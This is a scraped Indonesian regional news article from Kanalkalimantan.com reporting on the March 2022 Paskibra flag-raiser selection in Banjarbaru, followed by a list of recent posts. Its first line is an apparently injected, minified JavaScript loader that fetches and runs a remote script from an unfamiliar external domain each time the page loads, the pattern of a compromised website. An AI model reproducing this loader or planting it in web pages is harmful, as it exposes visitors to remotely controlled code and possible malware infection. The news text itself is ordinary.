(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Seleksi Paskibra di Banjarbaru Dimulai, Disporabudpar Gelar Tiga Hari


KANALKALIMANTAN.COM, BANJARBARU – Dinas Pemuda, Olahraga, Kebudayaan dan Pariwisata (Disporabudpar) Kota Banjarbaru menggelar seleksi Paskibra (Pasukan Pengibar Bendara).

Kepala Disporabudpar Kota Banjarbaru, A Yani Makkie mengatakan, seleksi Paskibra Kota Banjarbaru dilaksanakan mulai hari Senin 7 Maret sampai Rabu 9 Maret 2022 di Gedung Olah Raga (GOR) Rudy Resnawan.

“Harapannya nanti mampu menjadi pengibar Merah Putih terbaik ketika ditugaskan di tingkat kota, provinsi maupun tingkat nasional. Mampu tampil enerjik dan unggul dari yang lain,” kata Yani Makkie di sela pembukaan seleksi Paskibra Kota Banjarbaru, Senin (7/3/2022).

Menurut Yani Makkie, pemuda pemudi Banjarbaru yang mampu tampil melanjutkan kepemimpinan bangsa adalah generasi muda yang cerdas, terampil, berbudi pekerti yang luhur, memiliki ilmu pengetahuan yang luas, sehat jasmani dan rohani dan bertakwa kepada Allah SWT, serta memiliki semangat mengabdi kepada bangsa dan negara dan masyarakat.

 

 

Baca juga: Sistem Monitoring Digital, PLN Pastikan Pasokan Batu Bara Tercukupi ke Pembangkit

“Semuanya itu tentunya diperjuangkan sejak dini, karena selain memerlukan pengorbanan, juga memerlukan niat, tekad, semangat, dan kerja keras yang tinggi serta keuletan dan ketekunan dari pemuda pemudi itu sendiri,” katanya.

Seleksi Paskibra tingkat Kota Banjarbaru tahun 2022 dari 33 sekolah yang ada di Kota Banjarbaru, hanya 18 sekolah yang mengirimkan siswa-siswi terbaik ikut seleksi ini sebanyak 218 peserta.

Sementara itu, dari 218 peserta terdaftar, 110 orang peserta terdiri dari 55 putra dan 55 putri yang lulus seleksi administrasi dan mengikuti seleksi lanjutan. Sedangkan yang hadir saat seleksi hari ini ada sebanyak 92 orang peserta. Dari 110 peserta tersebut, akan diseleksi lagi menjadi 33 orang untuk mengikuti pembinaan dan 6 orang terpilih akan mengikuti seleksi tingkat Provinsi Kalimantan Selatan.

Kadisporabudpar mengatakan, pada tahun 2021 Kota Banjarbaru mengirim utusan Paskibra ke tingkat provinsi sebanyak 4 orang dan tingkat nasional 1 orang. Ia pun berharap ke depannya Kota Banjarbaru dapat terus mengirimkan siswa siswi terbaiknya ke tingkat provinsi dan tingkat nasional.

“Pembinaan Paskibra di tingkat sekolah diharapkan lebih ditingkatkan, agar mendorong siswa siswi di Kota Banjarbaru terus berprestasi dan memberikan kontribusi pembinaan dan pemberdayaan pemuda,” tuntasnya.

Seleksi Paskibra Kota Banjarbaru berasal dari PPI (Purna Paskibra Indonesia), TNI, seniman, budayawan, Dinas Kesehatan dan psikolog dari Universitas Lambung Mangkurat (ULM). Selama pelaksanaan seleksi Paskibra Kota Banjarbaru, seluruh panitia pelaksana maupun peserta tetap menerapkan protokol kesehatan. (Kanalkalimantan.com/al)

Reporter : al
Editor : bie


Risa

Recent Posts

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

7 menit ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

35 menit ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

2 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

2 jam ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

2 jam ago

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

4 jam ago

This website uses cookies.